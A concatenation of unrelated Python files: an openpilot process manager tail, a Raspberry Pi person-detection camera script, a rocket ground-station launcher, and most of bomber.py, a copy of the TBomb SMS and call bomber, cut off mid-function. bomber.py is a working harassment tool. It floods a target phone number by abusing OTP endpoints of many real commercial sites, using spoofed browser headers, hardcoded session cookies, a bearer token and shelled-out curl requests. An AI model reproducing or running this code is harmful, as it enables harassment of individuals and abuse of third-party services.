cloudlog.info("comparing version of %s %s vs %s" % (app, h1, h2))
if h2 is None or h1 != h2:
cloudlog.info("installing %s" % app)
success = install_apk(apk_path)
if not success:
cloudlog.info("needing to uninstall %s" % app)
system("pm uninstall %s" % app)
success = install_apk(apk_path)
assert success
def manager_update():
if os.path.exists(os.path.join(BASEDIR, "vpn")):
cloudlog.info("installing vpn")
os.system(os.path.join(BASEDIR, "vpn", "install.sh"))
update_apks()
def manager_prepare():
# build cereal first
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, "cereal"))
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
for p in managed_processes:
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
os.system("service call power 16 i32 0 s16 recovery i32 1")
def main():
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
if os.getenv("NOLOG") is not None:
del managed_processes['loggerd']
del managed_processes['tombstoned']
if os.getenv("NOUPLOAD") is not None:
del managed_processes['uploader']
if os.getenv("NOVISION") is not None:
del managed_processes['visiond']
if os.getenv("LEAN") is not None:
del managed_processes['uploader']
del managed_processes['loggerd']
del managed_processes['logmessaged']
del managed_processes['logcatd']
del managed_processes['tombstoned']
del managed_processes['proclogd']
if os.getenv("NOCONTROL") is not None:
del managed_processes['controlsd']
del managed_processes['radard']
if os.getenv("DEFAULTD") is not None:
managed_processes["controlsd"] = "selfdrive.controls.defaultd"
# support additional internal only extensions
try:
import selfdrive.manager_extensions
selfdrive.manager_extensions.register(register_managed_process)
except ImportError:
pass
params = Params()
params.manager_start()
# set unset params
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("IsFcwEnabled") is None:
params.put("IsFcwEnabled", "1")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("IsUploadVideoOverCellularEnabled") is None:
params.put("IsUploadVideoOverCellularEnabled", "1")
if params.get("IsDriverMonitoringEnabled") is None:
params.put("IsDriverMonitoringEnabled", "0")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# put something on screen while we set things up
if os.getenv("PREPAREONLY") is not None:
spinner_proc = None
else:
spinner_text = "chffrplus" if params.get("Passive")=="1" else "openpilot"
spinner_proc = subprocess.Popen(["./spinner", "loading %s"%spinner_text],
cwd=os.path.join(BASEDIR, "selfdrive", "ui", "spinner"),
close_fds=True)
try:
manager_update()
manager_init()
manager_prepare()
finally:
if spinner_proc:
spinner_proc.terminate()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall") == "1":
uninstall()
if __name__ == "__main__":
main()
# manual exit because we are forked
sys.exit(0)
|
main.py
|
# Name: Nigel Jacob
# Date: 26/07/2021
import config
import cv2 as cv
import RPi.GPIO as GPIO
from threading import Thread
def analyse() -> None:
print("Press 'q' to exit.")
while not cv.waitKey(1) & 0xFF == ord("q"):
try:
(success, img) = config.cap.read()
(class_ids, confs, bbox) = config.net.detect(img, confThreshold=config.ACCURACY)
except cv.error as e:
print(e)
break
if len(class_ids) != 0:
for (classId, confidence, box) in zip(
class_ids.flatten(), confs.flatten(), bbox
):
object_identified = config.classNames[classId - 1].upper()
prob_correct = round(confidence * 100, 2)
if object_identified == "PERSON":
color = config.RED
# Start alarm if there isn't noise already
if config.firstRun:
alarm = Thread(target=config.alert)
config.firstRun = False
if not alarm.is_alive():
alarm = Thread(target=config.alert)
alarm.start()
else:
color = config.GREEN
# Draw box around image and label object identified
cv.rectangle(img, box, color=color, thickness=2)
cv.putText(
img,
"%s %d%%" % (object_identified, prob_correct),
(box[0] + 5, box[1] + 20),
cv.FONT_HERSHEY_COMPLEX_SMALL,
1,
color,
2,
)
cv.imshow("Security Camera Feed", img)
if config.button.is_pressed:
break
cv.destroyAllWindows()
GPIO.cleanup()
if __name__ == "__main__":
analyse()
|
run.py
|
"""
Martlet 4/Pulsar Ground Control Software
CUSF 2018/19
"""
from gcs import usb
from gcs import gui_interface
from gcs import logging
import time
import signal
import multiprocessing
import argparse
# Todo: freeze script into executable once done
def run(args):
"""Initialise and run the backend.
args -- command line arguments
"""
############################################################################
# Create communication links between processes:
############################################################################
print("Initialising Martlet IV Ground Station...")
# Pipe USB data to logging processes
log_usb_pipe, usb_log_pipe = multiprocessing.Pipe(duplex=False)
# Duplex pipe between usb and gui processes
usb_gui_pipe, gui_usb_pipe = multiprocessing.Pipe(True)
############################################################################
# Define and start processes
############################################################################
log_ready = multiprocessing.Event() # Log process ready flag
log_ready.clear()
usb_ready = multiprocessing.Event() # USB process ready flag
usb_ready.clear()
gui_exit = multiprocessing.Event() # Flag for gui exit
gui_exit.clear()
print("Starting processes...")
# Todo: add ready signal to each process?
# Start gui/main process
gui_process = multiprocessing.Process(target=gui_interface.run, args=(gui_usb_pipe, gui_exit))
gui_process.start()
# Start logging process
log_process = multiprocessing.Process(target=logging.run, args=(log_usb_pipe, gui_exit, log_ready, "../logs"))
log_process.start()
while not log_ready.is_set():
# Wait for logging process to finish starting up
time.sleep(0.1)
# Start usb parsing process
usb_process = multiprocessing.Process(target=usb.run,
args=(args.port, usb_gui_pipe, usb_log_pipe, gui_exit, usb_ready))
usb_process.start()
while not usb_ready.is_set():
# Wait for USB process to finish starting up
time.sleep(0.1)
# # Start gui/main process
# gui_process = multiprocessing.Process(target=gui_interface.run, args=(gui_usb_pipe, gui_exit))
# gui_process.start()
print("Running...")
gui_process.join()
print("Exiting...")
print("GUI process ended")
usb_process.join()
print("USB process ended")
log_process.join()
print("Logging process ended")
time.sleep(0.2)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal.SIG_DFL) # Exit on Ctrl-C
# Process arguments
parser = argparse.ArgumentParser(description=
"""Martlet IV Ground Control Software.
Connect to Firing Controller on given serial port (default '/dev/ttyACM0')""")
parser.add_argument('-p', dest='port', type=str, nargs='?',
default='/dev/ttyACM0', help='Serial port to use')
run(parser.parse_args())
|
bomber.py
|
#!/usr/bin/env python
from datetime import datetime
import os
import hashlib
import sys
import time
import threading
import string
import random
import base64
import urllib.request
import urllib.parse
try:
import requests
except ImportError:
print('[!] Error: some dependencies are not installed')
print('Type \'pip install -r requirements.txt\' to install all required packages')
exit()
colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']
W='\033[0m'
# The Credit For This Code Goes To SpeedX And All Other Contributors Listed At https://github.com/TheSpeedX/TBomb
# If You Wanna Take Credits For This Code, Please Look Yourself Again
country_codes = {
'93': 'AF',
'355': 'AL',
'213': 'DZ',
'376': 'AD',
'244': 'AO',
'672': 'AQ',
'54': 'AR',
'374': 'AM',
'297': 'AW',
'61': 'AU',
'43': 'AT',
'994': 'AZ',
'973': 'BH',
'880': 'BD',
'375': 'BY',
'32': 'BE',
'501': 'BZ',
'229': 'BJ',
'975': 'BT',
'591': 'BO',
'387': 'BA',
'267': 'BW',
'55': 'BR',
'246': 'IO',
'673': 'BN',
'359': 'BG',
'226': 'BF',
'257': 'BI',
'855': 'KH',
'237': 'CM',
'238': 'CV',
'236': 'CF',
'235': 'TD',
'56': 'CL',
'86': 'CN',
'57': 'CO',
'269': 'KM',
'682': 'CK',
'506': 'CR',
'385': 'HR',
'53': 'CU',
'599': 'AN',
'357': 'CY',
'420': 'CZ',
'243': 'CD',
'45': 'DK',
'253': 'DJ',
'670': 'TL',
'593': 'EC',
'20': 'EG',
'503': 'SV',
'240': 'GQ',
'291': 'ER',
'372': 'EE',
'251': 'ET',
'500': 'FK',
'298': 'FO',
'679': 'FJ',
'358': 'FI',
'33': 'FR',
'689': 'PF',
'241': 'GA',
'220': 'GM',
'995': 'GE',
'49': 'DE',
'233': 'GH',
'350': 'GI',
'30': 'GR',
'299': 'GL',
'502': 'GT',
'224': 'GN',
'245': 'GW',
'592': 'GY',
'509': 'HT',
'504': 'HN',
'852': 'HK',
'36': 'HU',
'354': 'IS',
'91': 'IN',
'62': 'ID',
'98': 'IR',
'964': 'IQ',
'353': 'IE',
'972': 'IL',
'39': 'IT',
'225': 'CI',
'81': 'JP',
'962': 'JO',
'254': 'KE',
'686': 'KI',
'383': 'XK',
'965': 'KW',
'996': 'KG',
'856': 'LA',
'371': 'LV',
'961': 'LB',
'266': 'LS',
'231': 'LR',
'218': 'LY',
'423': 'LI',
'370': 'LT',
'352': 'LU',
'853': 'MO',
'389': 'MK',
'261': 'MG',
'265': 'MW',
'60': 'MY',
'960': 'MV',
'223': 'ML',
'356': 'MT',
'692': 'MH',
'222': 'MR',
'230': 'MU',
'262': 'RE',
'52': 'MX',
'691': 'FM',
'373': 'MD',
'377': 'MC',
'976': 'MN',
'382': 'ME',
'212': 'EH',
'258': 'MZ',
'95': 'MM',
'264': 'NA',
'674': 'NR',
'977': 'NP',
'31': 'NL',
'687': 'NC',
'64': 'NZ',
'505': 'NI',
'227': 'NE',
'234': 'NG',
'683': 'NU',
'850': 'KP',
'47': 'SJ',
'968': 'OM',
'92': 'PK',
'680': 'PW',
'970': 'PS',
'507': 'PA',
'675': 'PG',
'595': 'PY',
'51': 'PE',
'63': 'PH',
'48': 'PL',
'351': 'PT',
'974': 'QA',
'242': 'CG',
'40': 'RO',
'7': 'RU',
'250': 'RW',
'590': 'MF',
'290': 'SH',
'508': 'PM',
'685': 'WS',
'378': 'SM',
'239': 'ST',
'966': 'SA',
'221': 'SN',
'381': 'RS',
'248': 'SC',
'232': 'SL',
'65': 'SG',
'421': 'SK',
'386': 'SI',
'677': 'SB',
'252': 'SO',
'27': 'ZA',
'82': 'KR',
'211': 'SS',
'34': 'ES',
'94': 'LK',
'249': 'SD',
'597': 'SR',
'268': 'SZ',
'46': 'SE',
'41': 'CH',
'963': 'SY',
'886': 'TW',
'992': 'TJ',
'255': 'TZ',
'66': 'TH',
'228': 'TG',
'690': 'TK',
'676': 'TO',
'216': 'TN',
'90': 'TR',
'993': 'TM',
'688': 'TV',
'256': 'UG',
'380': 'UA',
'971': 'AE',
'44': 'GB',
'1': 'US',
'598': 'UY',
'998': 'UZ',
'678': 'VU',
'379': 'VA',
'58': 'VE',
'84': 'VN',
'681': 'WF',
'967': 'YE',
'260': 'ZM',
'263': 'ZW'
}
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def banner():
clr()
logo="""
████████ ██████ ██
▒█▒▒▒██ ██
██ ██ ██ ████ ██ ██ ██
██ ██████▒ ██▒▒██ ███ ███ █████
██ ██▒▒▒██ ██ ██ ██▒█▒██ ██▒▒██
██ ██ ██ ██ ██ ██ ▒ ██ ██ ██
██ ██████▒ ▒████▒ ██ ██ █████▒
▒▒ ▒▒▒▒▒▒ ▒▒▒▒ ▒▒ ▒▒ ▒▒▒▒▒
"""
print(random.choice(colors)+logo+W)
print("\n")
count_inf = 0
def infinite(pn, dl, ch, max):
global count_inf
while True:
while os.path.exists('proc.xxx'):
time.sleep(0.5)
os.system('touch proc.xxx')
api = random.choice(ch)
try:
ret = getapi(pn, api, 91)
except Exception:
ret = False
if not ret:
while ch.count(api) > 0:
ch.remove(api)
continue
os.system('rm proc.xxx >/dev/null 2>&1')
count_inf += 1
# os.system('echo SpeedX >> count.xxx')
time.sleep(float(dl))
if (count_inf > maxlim):
exit()
def checkinternet():
res = False
try:
requests.get('https://www.google.com', verify=True)
res = False
except Exception:
res = True
if res:
print("\n\n\tIt seems That Your Internet Speed is Slow or You Are Using Proxies...")
print('\t\tTBomb Will Stop Now...\n\n')
banner()
exit()
def getapi(pn, lim, cc):
global country_codes
cc = str(cc).strip()
cnn = country_codes[cc]
lim = int(lim)
url = ["https://www.oyorooms.com/api/pwa/generateotp?country_code=%2B" +
str(cc) + "&nod=4&phone=" + pn, "https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo=" + pn, "https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=" + pn]
try:
if lim < len(url):
urllib.request.urlopen(str(url[lim]))
return True
except (urllib.error.HTTPError, urllib.error.URLError):
return False
if lim == 3:
headers = {
'Host': 'm.netmeds.com',
'content-length': '76',
'accept': '*/*',
'origin': 'https://m.netmeds.com',
'x-requested-with': 'XMLHttpRequest',
'save-data': 'on',
'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'referer': 'https://m.netmeds.com/customer/account/login/',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
'cookie': '_ga=GA1.3.185497001.1558720330'}
data = {
'register_mobileno': pn,
'logintype': 'Otp',
'uniq_identy': 'quWqfunF',
'forget_pwd': 'N'
}
response = requests.post('https://m.netmeds.com/sociallogin/popup/nmsgetcode/', headers=headers, data=data)
return True
elif lim == 4:
headers = {
'Host': 'client-api.goomo.com',
'origin': 'https://www.goomo.com',
'client': 'm-web',
'x-goomo-platform': 'mWeb',
'dnt': '1',
'content-type': 'application/json',
'accept': '*/*',
'referer': 'https://www.goomo.com/hotels',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-US,en;q=0.9'}
data = {"email":"fakeemail@gmail.com","phone_number":pn,"country_code":cc}
response = requests.post('https://client-api.goomo.com/v2/phone_confirmation/verify_user', headers=headers, json=data)
return True
elif lim == 5:
headers = {
'Accept': '*/*',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
'Content-Length': '34',
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'www.oriyamatrimony.com',
'Referer': 'https://www.oriyamatrimony.com/',
'User-Agent': 'Mozilla/5.0 (Windows NT 8.1; Win64; x64; rv:59.0) Gecko/20 Firefox/56.0',
'X-Requested-With': 'XMLHttpRequest'}
data = {'countrycode': cc, 'mobileno': pn}
response = requests.post('https://www.oriyamatrimony.com/login/mobileappsms-homepage.php', headers=headers, data=data)
return True
elif lim == 6:
headers = {
'host': 'www.flipkart.com',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0',
'accept': '*/*',
'accept-language': 'en-US,en;q=0.5',
'accept-encoding': 'gzip, deflate, br',
'referer': 'https://www.flipkart.com/',
'x-user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 FKUA/website/41/website/Desktop',
'origin': 'https://www.flipkart.com',
'connection': 'keep-alive',
'Content-Type': 'application/json; charset=utf-8'}
data = {"loginId":["+"+cc+pn],"supportAllStates":true}
response = requests.post('https://www.flipkart.com/api/6/user/signup/status', headers=headers, json=data)
return True
elif lim == 7:
cookies = {
'Cookie:T': 'BR%3Acjvqzhglu1mzt95aydzhvwzq1.1558031092050',
'SWAB': 'build-44be9e47461a74d737914207bcbafc30',
'lux_uid': '155867904381892986',
'AMCVS_17EB401053DAF4840A490D4C%40AdobeOrg': '1',
'AMCV_17EB401053DAF4840A490D4C%40AdobeOrg': '-227196251%7CMCIDTS%7C18041%7CMCMID%7C63273353035509304576927719203948933246%7CMCAID%7CNONE%7CMCOPTOUT-1558686245s%7CNONE%7CMCAAMLH-1559283845%7C12%7CMCAAMB-1559283845%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI',
's_cc': 'true',
'SN': '2.VI8085A6A237EB4C62836C8809F0D312EB.SI21A9EC4E99B949B2ACE6361B3F0208CC.VS187649B2B06A44C69824006710CB6D83.1558679078',
'gpv_pn': 'HomePage',
'gpv_pn_t': 'Homepage',
'S': 'd1t17GQVqPz9KPzobP3M4GQkjPy34TjfJxI4SbXVIvhwzm3mE13vfSEulmf90D/7L710qUpMq8mA0k2bx6b2DuwIS4g==',
's_sq': '%5B%5BB%5D%5D'}
headers = {
'Host': 'www.flipkart.com',
'Connection': 'keep-alive',
'Content-Length': '60',
'X-user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 FKUA/website/41/website/Desktop',
'Origin': 'https://www.flipkart.com',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': '*/*',
'Referer': 'https://www.flipkart.com/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
}
data = {
'loginId': '+'+cc+pn,
'state': 'VERIFIED',
'churnEmailRequest': 'false'
}
response = requests.post('https://www.flipkart.com/api/5/user/otp/generate', headers=headers, cookies=cookies, data=data)
return True
elif lim == 8:
headers = {
'Host': 'www.ref-r.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': '26',
'DNT': '1',
'Connection': 'keep-alive',
}
data = {
'mobile': pn,
'submit': '1',
'undefined': ''
}
response = requests.post('https://www.ref-r.com/clients/lenskart/smsApi', headers=headers, data=data)
return True
elif lim == 9:
headers = {
'X-DROID-VERSION': '4.12.5',
'API-Version': '2.0',
'user-agent': 'samsung SM-G9350 0 4.4.2',
'client-version': 'Android-4.12.5',
'X-DROID-VERSION-CODE': '158',
'Accept': 'application/json',
'client-name': 'Practo Android App',
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'accounts.practo.com',
'Connection': 'Keep-Alive',
'Content-Length': '96'}
data = {
'client_name': 'Practo Android App',
'mobile': '+'+cc+91,
'fingerprint': '',
'device_name':'samsung+SM-G9350'}
response = requests.post( "https://accounts.practo.com/send_otp", headers=headers, data=data)
rd=response.text
# rd = os.popen('curl -s -X POST -H "X-DROID-VERSION:4.12.5" -H "API-Version:2.0" -H "user-agent:samsung SM-G9350 0 4.4.2" -H "client-version:Android-4.12.5" -H "X-DROID-VERSION-CODE:158" -H "Accept:application/json" -H "client-name:Practo Android App" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:accounts.practo.com" -H "Connection:Keep-Alive" -H "Content-Length:96" -d "client_name=Practo+Android+App&fingerprint=&mobile=%2B' + cc + pn + '&device_name=samsung+SM-G9350&" "https://accounts.practo.com/send_otp"').read()
return rd.find("success") != -1
elif lim == 10:
headers = {
'Host': 'm.pizzahut.co.in',
'content-length': '114',
'origin': 'https://m.pizzahut.co.in',
'authorization': 'Bearer ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0luUnZhMlZ1SWpvaWIzQXhiR0pyZEcxbGRYSTBNWEJyTlRGNWNqQjBkbUZsSWl3aVlYVjBhQ0k2SW1WNVNqQmxXRUZwVDJsS1MxWXhVV2xNUTBwb1lrZGphVTlwU2tsVmVra3hUbWxLT1M1bGVVcDFXVmN4YkdGWFVXbFBhVWt3VGtSbmFVeERTbmRqYld4MFdWaEtOVm96U25aa1dFSjZZVmRSYVU5cFNUVlBSMUY0VDBkUk5FMXBNV2xaVkZVMVRGUlJOVTVVWTNSUFYwMDFUV2t3ZWxwcVp6Vk5ha0V6V1ZSTk1GcHFXV2xNUTBwd1l6Tk5hVTlwU205a1NGSjNUMms0ZG1RelpETk1iVEZvWTI1U2NWbFhUbkpNYlU1MllsTTVhMXBZV214aVJ6bDNXbGhLYUdOSGEybE1RMHBvWkZkUmFVOXBTbTlrU0ZKM1QyazRkbVF6WkROTWJURm9ZMjVTY1ZsWFRuSk1iVTUyWWxNNWExcFlXbXhpUnpsM1dsaEthR05IYTJsTVEwcHNaVWhCYVU5cVJURk9WR3MxVG5wak1VMUVVWE5KYlRWcFdtbEpOazFVVlRGUFZHc3pUWHByZDA1SU1DNVRaM1p4UmxOZldtTTNaSE5pTVdSNGJWVkdkSEExYW5WMk9FNTVWekIyZDE5TVRuTkJNbWhGVkV0eklpd2lkWEJrWVhSbFpDSTZNVFUxT1RrM016a3dORFUxTnl3aWRYTmxja2xrSWpvaU1EQXdNREF3TURBdE1EQXdNQzB3TURBd0xUQXdNREF0TURBd01EQXdNREF3TURBd0lpd2laMlZ1WlhKaGRHVmtJam94TlRVNU9UY3pPVEEwTlRVM2ZTd2lhV0YwSWpveE5UVTVPVGN6T1RBMExDSmxlSEFpT2pFMU5qQTRNemM1TURSOS5CMGR1NFlEQVptTGNUM0ZHM0RpSnQxN3RzRGlJaVZkUFl4ZHIyVzltenk4',
'x-source-origin': 'PWAFW',
'content-type': 'application/json',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'save-data': 'on',
'languagecode': 'en',
'referer': 'https://m.pizzahut.co.in/login',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
'cookie': 'AKA_A2=A'}
data = {"customer":{"MobileNo":pn,"UserName":pn,"merchantId":"98d18d82-ba59-4957-9c92-3f89207a34f6"}}
response = requests.post('https://m.pizzahut.co.in/api/cart/send-otp?langCode=en', headers=headers, data=data)
return True
elif lim == 11:
headers = {
'host': 'www.goibibo.com',
'user-agent': 'Mozilla/5.0 (Windows NT 8.0; Win32; x32; rv:58.0) Gecko/20100101 Firefox/57.0',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'accept-language': 'en-US,en;q=0.5',
'accept-encoding': 'gzip, deflate, br',
'referer': 'https://www.goibibo.com/mobile/?sms=success',
'content-type': 'application/x-www-form-urlencoded',
'content-length': '14',
'connection': 'keep-alive',
'upgrade-insecure-requests': '1'}
data = {'mbl': pn}
response = requests.post('https://www.goibibo.com/common/downloadsms/', headers=headers, data=data)
return True
elif lim == 12:
headers = {
'Host': 'www.apollopharmacy.in',
'content-length': '17',
'accept': '*/*',
'origin': 'https://www.apollopharmacy.in',
'x-requested-with': 'XMLHttpRequest',
'save-data': 'on',
'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'referer': 'https://www.apollopharmacy.in/sociallogin/mobile/login/',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
'cookie': 'section_data_ids=%7B%22cart%22%3A1560239751%7D'}
data = {'mobile': pn}
response = requests.post('https://www.apollopharmacy.in/sociallogin/mobile/sendotp/', headers=headers, data=data)
rd=response.text
return rd.find("sent") != -1
elif lim == 13:
cookies = {
'Cookie:_ga': 'GA1.2.979928319.1560364071',
'_gid': 'GA1.2.666270216.1560364071',
'V': '201',
'_fbp': 'fb.1.1560364076913.1528349725',
'cto_lwid': 'd91bea3a-7610-45aa-8f78-65a0d740fb46',
'PushSubscriberStatus': 'DENIED',
'peclosed': 'true',
'G_ENABLED_IDPS': 'google',
'TS018cc593': '01ef61aed0fca110f50d8e3be2c66eb83188f6df8495c0ed2cd772829370fc12690954aad0834f545b57764467dbb66efb05d481a8958aebb273751956ef9eb383a3ba22dd1c94d82021e9d4c40011d4ab9bd97c6f0a74628ac12e8f7bcb663c1608e7288ebd252051cb84def3b021d3bcf643d3f3728ca9c0d9c780d171578ba966774f11ac44864a7f3da59791cb55f2741f23d72f7843efe9306459c00ec2e5f00065729a8573baba42384bb7cf46eb55cf89f72f1dcd5619a26e4ff32c63d06cac8c4bb158da6640bc0b11193134cbf38050ae0db230aa258b1181749fb0373afe041ad1aeffd0c08be7a62010db02cc65edfb1341d2de54cdf475c5dcd84e16c64c50',
'_gac_UA-68002030-1': '1.1560366197.Cj0KCQjwxYLoBRCxARIsAEf16-tx5UXrrP9SEhR8dPkTL4a9woEF7Ae-kvSlzKdgq35y31DeK3_uhg8aAkRBEALw_wcB',
'cdigiMrkt': 'utm_source%3A%7Cutm_medium%3A%7Cdevice%3Amobile%7Cexpires%3AFri%2C%2012%20Jul%202019%2019%3A03%3A17%20GMT%7C',
'ImpressionCookie': '4',
'ip': '10.1.10.1',
'sessionStatus': 'true|undefined',
'FirstPage': 'Thu Jun 13 2019 00:33:53 GMT+0530 (India Standard Time)',
'_dc_gtm_UA-68002030-1': '1',
'uI': 'johnyaho%40gmail.com',
'TS01fe4249': '01ef61aed09c32c6a53ce9e431a6a719c416867f2f3ad713fde2e74175bc248acc7a523f41e9751d032859a159bfff87664b90c3d0a9dfb2392f75876ccbe273b8a8e81d7a8d25047453c17a2905eca7eff26b780c'}
headers = {
'Host': 'www.ajio.com',
'Connection': 'keep-alive',
'Content-Length': '144',
'Accept': 'application/json',
'Origin': 'https://www.ajio.com',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'content-type': 'application/json',
'Referer': 'https://www.ajio.com/signup',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6'}
data = {"firstName":"SpeedX","login":"johnyaho@gmail.com","password":"Rock@5star","genderType":"Male","mobileNumber":"0000","requestType":"SENDOTP"}
response = requests.post('https://www.ajio.com/api/auth/signupSendOTP', headers=headers, cookies=cookies, json=data)
rd=response.text
if rd.find("\"statusCode\":\"1\"") != -1:
return True
else:
return False
elif lim == 14:
headers = {
'Host': 'api.cloud.altbalaji.com',
'Connection': 'keep-alive',
'Accept': 'application/json, text/plain, */*',
'Origin': 'https://lite.altbalaji.com',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Mobile Safari/537.36',
'Content-Type': 'application/json;charset=UTF-8',
'Referer': 'https://lite.altbalaji.com/subscribe?progress=input',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
}
data = {"country_code":cc,"phone_number":pn}
response = requests.post('https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN', headers=headers, json=data)
rd=response.text
return rd == '24f467b24087ff48c96321786d89c69f'
elif lim == 15:
cookies = {
'Cookie:frontend': 'a27mn3h3irt1rlt6i55s93p9r5',
'frontend_cid': '8zqBBzwQTMIt9UKg',
'_BEAMER_USER_ID_gADrycBn12870': 'c9fe4f7d-b421-4bad-9cf2-0a4db716dff4',
'G_ENABLED_IDPS': 'google',
}
headers = {
'Host': 'www.aala.com',
'Connection': 'keep-alive',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Origin': 'https://www.aala.com',
'X-Requested-With': 'XMLHttpRequest',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'https://www.aala.com/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6,ar;q=0.5',
}
data = {
'email': cc+pn,
'firstname': 'SpeedX',
'lastname': 'SpeedX'
}
response = requests.post('https://www.aala.com/accustomer/ajax/getOTP', headers=headers, cookies=cookies, json=data)
rd=response.text
return rd.find('code:') != -1
elif lim == 16:
data = {
'method': 'SMS',
'countryCode': 'id',
'phoneNumber': cc+pn,
'templateID': 'pax_android_production'
}
response = requests.post('https://api.grab.com/grabid/v1/phone/otp', data=data)
return True
elif lim == 100:
rd = os.popen('curl -s -X GET "https://www.makaan.com/apis/nc/sendOtpOnCall/16257065/' +
pn + '?callType=otpOnCall"').read()
return rd.lower().find("new otp has been") != -1
elif lim == 101:
rd = os.popen('curl -s -X POST -d mobile=%2B' + cc + '-' + pn +
' https://marketing.tllms.com/elearn/api/v4/authentications/phone_call').read()
return rd.lower().find("otp requests exceeded") == -1
elif lim == 102:
